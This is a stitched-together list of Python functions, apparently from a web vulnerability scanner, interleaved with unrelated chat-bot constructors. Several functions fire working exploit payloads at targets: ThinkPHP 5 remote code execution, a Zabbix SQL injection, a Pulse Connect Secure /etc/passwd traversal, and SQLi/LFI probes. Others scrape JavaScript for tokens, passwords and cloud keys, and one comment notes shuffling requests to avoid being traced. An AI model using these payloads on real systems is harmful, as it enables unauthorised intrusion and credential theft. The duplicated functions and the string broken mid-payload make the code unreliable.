def __init__(self, host): self.urls = [] self.js = [] self.domain = '' self.host = host self.result = [] self.req = Requests()
def __init__(self, host): self.links = [] self.urls = [] self.js = [] self.host = host self.result = [] self.req = Requests()
def __init__(self, user_id, chat_id, peer_id, max_pred): print("Actions init") self.is_ban_or_kik = False self.user_id = user_id self.chat_id = chat_id self.peer_id = peer_id self.max_pred = max_pred self.requests = Requests(peer_id, chat_id)
def __init__(self, ip): self.url = ip self.result = [] self.random = random.randint(100000000, 200000000) self.win = 'set /a ' + str(self.random) self.linux = 'echo ' + str(self.random) self.timeout = 3 self.req = Requests()
def get_info(url): try: req = Requests() url = url + '/solr/' r = req.get(url) if r.status_code is 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text: return 'Apache Solr Admin leask: ' + url except Exception: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): try: url = url + '/solr/' r = req.get(url) if r.status_code is 200 and 'Solr Admin' in r.content and 'Dashboard' in r.content: return 'Apache Solr Admin leask' except Exception: pass
def __init__(self, dbname, apps): self.notstr = '' self.apps = apps self.notlen = '' self.goto = '' self.title = '' self.dbname = dbname self.outjson = [] self.req = Requests()
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" try: r = req.get(url + payload) if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text): return 'thinkphp5_rce_1 | ' + url except Exception as e: pass
def __init__(self, dbname): self.notstr = '' self.notlen = '' self.goto = '' self.title = '' self.dbname = dbname self.ext = 'asp,php' self.outjson = [] self.req = Requests()
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17" try: r = req.get(url + payload) if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text): return 'CVE-2016-10134 zabbix sqli:' + url except Exception as e: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" try: r = req.get(url + payload) if 'root:x:0:0:root' in r.text: return 'CVE-2019-11510 Pulse Connect Secure File | ' + url except Exception as e: pass
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200: if '<title>phpinfo()' in r.text or 'php_version' in r.text: return 'phpinfo leaks: ' + url + i except: pass
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200 and '<html>' not in r.text: if not re.search(r'{"\w+":', r.text): if verify(r.text): return 'leaks : ' + url + i except: pass
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200 and '<html' not in r.text: if not re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text): if verify(r.text): return 'leaks : ' + url + i except: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num) try: headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=headers) if random_num in r.text: return 'thinkphp_5_0_23_rce | ' + url except Exception as e: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = "//www.example.com" try: r = req.get(url + payload) if r.is_redirect and 'www.example.com' in r.headers.get( 'Location'): return 'Django < 2.0.8 任意URL跳转漏洞' except Exception as e: pass
def checkwaf(url): try: req = Requests() r = req.get(url) result = verify(r.headers, r.text[:10000]) if result == 'NoWAF': for i in payload: r = req.get(url + i) result = verify(r.headers, r.text[:10000]) return result except: return 'NoWAF'
def __init__(self, update_object): print("Controller init") self.u = update_object self.user = find_user(update_object['from_id']) self.text = update_object['text'] self.command = self.payloadParse() self.r = Requests(update_object['peer_id']) self.payloadParse() self.switchLevel(self.user.level)
def robots(url): result = '' try: req = Requests() r = req.get(url + '/robots.txt') if r.status_code == 200 and '<html' not in r.text: result = re.findall(r"/[\w\?\.=/]+/?", r.text) if result: return list(set(result)) except (UnboundLocalError, AttributeError): pass except Exception as e: logging.exception(e)
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200: if re.search( r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd', r.text, re.S): if verify(r.text): return 'Admin_Page : ' + url + i elif r.status_code == 403: return 'May be the login page : ' + url + i except: pass
class JsLeaks(): def __init__(self): self.result = [] self.req = Requests() def pool(self, urls): try: with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: result = {executor.submit(self.get_js, i): i for i in urls} for future in concurrent.futures.as_completed(result, timeout=3): future.result() except (EOFError, concurrent.futures._base.TimeoutError): pass except Exception as e: logging.exception(e) return self.result def verify(self, text): result = True for i in text: if not re.search(r'^0\d\.\d+\.\d+\.\d+|google|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i): result = False break return result def get_js(self, url): r = self.req.get(url) regex = ( # 匹配url r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b', r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))', # 匹配邮箱 r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', # 匹配token或者密码泄露 # 例如token = xxxxxxxx, 或者"apikey" : "xssss" r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}', # 匹配 r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)', # 匹配 "/task/router" 这种路径 r'"(/\w{3,}/\w{3,})"', # 匹配IP地址 r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b', # 匹配云泄露 r'[\w]+\.cloudfront\.net', r'[\w\-.]+\.appspot\.com', r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*', r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)', r'(storage\.cloud\.google\.com\/[\w\-.]+)', r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)', # 匹配手机号 r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}' # 匹配域名 r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))' ) for _ in regex: text = re.findall(_, r.text[:100000], re.M | re.I) if text is not None and self.verify(text): text = list(map(lambda x: url + ' Leaks: ' + x, text)) self.result.extend(text)
def ipinfo(host): out = [] if not re.search(r'\d+\.\d+\.\d+\.\d+', host): req = Requests() try: r = req.get( 'https://viewdns.info/iphistory/?domain={}'.format(host)) result = re.findall( r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text, re.S | re.I) if result: for i in result: if iscdn(i): out.append(i) except: pass return out
def web_info(url): host = parse_host(url) ipaddr = parse_ip(host) url = url.strip('/') address = geoip(ipaddr) wafresult = checkwaf(url) req = Requests() # noinspection PyBroadException try: r = req.get(url) coding = chardet.detect(r.content).get('encoding') r.encoding = coding webinfo = WebPage(r.url, r.text, r.headers).info() except Exception as e: logging.exception(e) webinfo = {} if webinfo: console('Webinfo', host, 'title: {}\n'.format(webinfo.get('title'))) console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps'))) console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server'))) console('Webinfo', host, 'WAF: {}\n'.format(wafresult)) else: webinfo = {} wafresult = 'None' if iscdn(host): osname = osdetect(host) else: osname = None data = { host: { 'WAF': wafresult, 'Ipaddr': ipaddr, 'Address': address, 'Webinfo': webinfo, 'OS': osname, } } return data, webinfo.get('apps'), webinfo.get('title')
def checkwaf(url): try: req = Requests() r = req.get(url) result = verify(r.headers, r.text[:10000]) if result == 'NoWAF': for i in payload: r = req.get(url + i) result = verify(r.headers, r.text[:10000]) if result != 'NoWAF': return result except UnboundLocalError: pass except Exception as e: logging.exception(e) host = parse_host(url) if not iscdn(host): return 'CDN IP' return 'NoWAF'
def verify_https(url): # 验证域名是http或者https的 # 如果域名是302跳转 则获取跳转后的地址 req = Requests() url2 = parse.urlparse(url) if url2.netloc: url = url2.netloc elif url2.path: url = url2.path # noinspection PyBroadException try: r = req.get('https://' + url) getattr(r, 'status_code') if r.status_code == 302 or r.status_code == 301: r = req.get('https://' + 'www.' + url) if r.status_code == 200: return 'https://' + 'www.' + url return 'https://' + url except Exception as e: # noinspection PyBroadException try: req.get('http://' + url) return 'http://' + url except Exception: pass
def verify_https(url): # 验证域名是http或者https的 # 如果域名是302跳转 则获取跳转后的地址 req = Requests() # noinspection PyBroadException if '://' in url: try: r = req.get(url) return url except Exception as e: pass host = parse_host(url) url2 = parse.urlparse(url) if url2.netloc: url = url2.netloc elif url2.path: url = url2.path # noinspection PyBroadException try: r = req.get('https://' + url) getattr(r, 'status_code') console('Verify', host, 'https://' + url + '\n') return 'https://' + url except AttributeError: # noinspection PyBroadException try: req.get('http://' + url) console('Verify', host, 'http://' + url + '\n') return 'http://' + url except Exception: pass except Exception as e: logging.exception(e)
class SqlLfi(): def __init__(self): self.result = [] self.req = Requests() def sqli(self, qurl): payload = { "'", "%2527", "')", " AnD 7738=8291" } LFI_payload = {'../../../../etc/passwd|root:x', '../../../../etc/group|root:x', 'random.php|Failed opening', 'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='******'{} SQLi:{}'.format(dbms, qurl) self.result.append(result) raise Getoutofloop for i in LFI_payload: url = '' lfi, pattern = i.split('|') if re.search(r'=\w+\.\w{3}$', qurl): url = re.sub(r'\w+\.\w{3}$', lfi, qurl) elif re.search('=\w+', qurl): url = re.sub(r'\w+$', lfi, qurl) r = self.req.get(url) if re.search(pattern, r.text, re.S): self.result.append('LFI: {}'.format(url)) break except: pass def pool(self, urls): host = dedup_url(urls) with concurrent.futures.ThreadPoolExecutor( max_workers=30) as executor: executor.map(self.sqli, host) return self.result
def web_info(url): host = parse_host(url) ipaddr = parse_ip(host) url = url.strip('/') address = geoip(ipaddr) wafresult = checkwaf(url) req = Requests() try: r = req.get(url) coding = chardet.detect(r.content).get('encoding') r.encoding = coding webinfo = WebPage(r.url, r.text, r.headers).info() except Exception as e: webinfo = {} if webinfo: console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title'))) console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps'))) console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server'))) console('Webinfo', host, 'WAF: {}\n'.format(wafresult)) else: webinfo = {} wafresult = 'None' if iscdn(host): osname = osdetect(host) else: osname = None pdns = virustotal(host) reverseip = reverse_domain(host) webinfo.update({"pdns": pdns}) webinfo.update({"reverseip": reverseip}) data = { host: { 'WAF': wafresult, 'Ipaddr': ipaddr, 'Address': address, 'Webinfo': webinfo, 'OS': osname, } } return data, webinfo.get('apps')
def __init__(self, dbname, apps, host, title): self.dbname = dbname self.apps = apps self.title = title self.headers = get_ua() self.outjson = [] self.wordlist = [] self.host = host self.urls = self.get_urls(self.host) self.req = Requests() # url请求随机顺序 避免溯源 random.shuffle(self.urls)
def checkwaf(url): result = 'NoWAF' host = parse_host(url) if not iscdn(host): return 'CDN IP' try: req = Requests() r = req.get(url) result = verify(r.headers, r.text) if result == 'NoWAF': for i in payload: r = req.get(url + i) result = verify(r.headers, r.text) if result != 'NoWAF': return result else: return result except (UnboundLocalError, AttributeError): pass except Exception as e: logging.exception(e)